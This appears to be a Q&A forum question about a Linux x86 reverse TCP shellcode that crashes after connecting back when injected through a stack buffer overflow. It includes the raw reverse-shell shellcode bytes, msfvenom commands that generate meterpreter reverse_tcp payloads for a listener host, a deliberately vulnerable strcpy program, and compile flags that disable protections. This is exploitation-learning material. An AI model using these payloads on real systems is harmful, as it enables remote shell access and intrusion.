# Why reverse_tcp Shellcode doesn't work?

Tags: stack-overflow, buffer-overflow, exploit, shellcode

I am using this shellcode:

`\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80`

from http://shell-storm.org/shellcode/files/shellcode-883.php

When I execute the .c program, it works, it receives connection and I can execute commands without any problem.

The problem is when injecting it in a buffer overflow, from the `gdb`: I receive the connection (which means that shellcode, offset and EIP are allright) and I am using the right IP and PORT, but right away, it just crashes.

I have tried with other shellcodes, with:

```
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.15.129 lport=1337 -b '\x00' -f c
```

and:

```
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.15.129 lport=1337 -b '\x00\xff\x09\x0a' -e x86/shikata_ga_nai -f c
```

And I receive the connection well, but.... right away, it just crashes and can't execute commands.

Mentioning that this is my .c vulnerable code:

```
#include <string.h>
#include <stdio.h>

void func(char *arg){

    char nombre[90];
    strcpy(nombre,arg);
    printf ("\nBienvenido a Linux Exploiting %s\n\n", nombre);

}

int main (int argc, char *argv[]){

    if (argc != 2){

        printf ("Uso %s Nombre\n", argv[0]);
        exit(0);

    }

    func(argv[1]);
    printf("Fin del programa\n");
    return 0;
}
```

I inject: Shellcode + (102-74 (or -98 with the metasploit payloads))x"A" + RET (I get the addr alright by setting a break after the `strcpy`and getting where the buffer starts exactly and I know it works, because as I said, I receive the connection (If I change a byte anywhere I don't receive anything).

And I am compiling it with: `//gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack -g prog2.c -o prog2`

Comment: Could you try a shellcode with `stdin` reopen and tell if it works (or not)? Like [this one](http://shell-storm.org/shellcode/files/shellcode-219.php).